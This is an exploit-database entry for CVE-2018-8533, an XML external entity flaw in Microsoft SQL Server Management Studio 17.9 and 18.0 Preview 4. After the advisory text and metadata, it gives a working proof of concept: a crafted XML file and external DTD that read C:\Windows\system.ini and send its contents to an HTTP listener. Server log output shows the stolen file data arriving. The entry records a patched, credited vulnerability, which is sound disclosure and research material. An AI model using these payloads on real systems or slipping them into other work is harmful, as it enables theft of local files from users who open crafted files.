Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection

vendor:

SQL Server Management Studio

by:

John Page (aka hyp3rlinx)

5.5

CVSS

MEDIUM

XML External Entity Injection

611

CWE

Product Name: SQL Server Management Studio

Affected Version From: SQL Server Management Studio 17.9

Affected Version To: SQL Server Management Studio 18.0 (Preview 4)

Patch Exists: YES

Related CWE: CVE-2018-8533

CPE: microsoft:sql_server_management_studio

Metasploit:

Other Scripts:

Platforms Tested:

2018

Microsoft SQL Server Management Studio 17.9 – XML External Entity Injection

This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of REGSRVR files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process.

Mitigation:

Apply the latest security updates from Microsoft to fix this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)	
# Website: hyp3rlinx.altervista.org
# Venodor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)	
# CVE: CVE-2018-8533
# References: 
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533) 

# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable 
# installations of Microsoft SQL Server Management Studio. User interaction is required to 
# exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

# The specific flaw exists within the handling of REGSRVR files. Due to the improper 
# restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the 
# XML parser to access the URI and embed the contents back into the XML document for further processing.
# An attacker can leverage this vulnerability to disclose information in the context of the current process.

# Exploit/POC

# 1) python -m SimpleHTTPServer

# 2) "POC.xml"

<?xml version="1.0"?>
<!DOCTYPE injectme [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

# 3) "payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

# Result:

Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -